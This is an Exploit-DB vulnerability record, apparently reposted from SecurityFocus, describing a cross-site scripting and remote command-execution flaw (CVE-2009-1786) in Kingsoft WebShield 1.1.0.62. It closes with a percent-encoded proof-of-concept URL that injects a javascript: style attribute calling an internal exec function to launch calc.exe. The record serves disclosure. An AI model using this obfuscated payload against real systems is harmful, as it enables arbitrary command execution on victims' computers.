Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution Vulnerability

2009-05-20T00:00:00
ID EDB-ID:33001
Type exploitdb
Reporter inking
Modified 2009-05-20T00:00:00

Description

Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability. CVE-2009-1786. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/35038/info

The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.

Remote attackers may exploit this vulnerability to compromise an affected computer.

This issue affects WebShield 1.1.0.62 and prior versions. 

http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e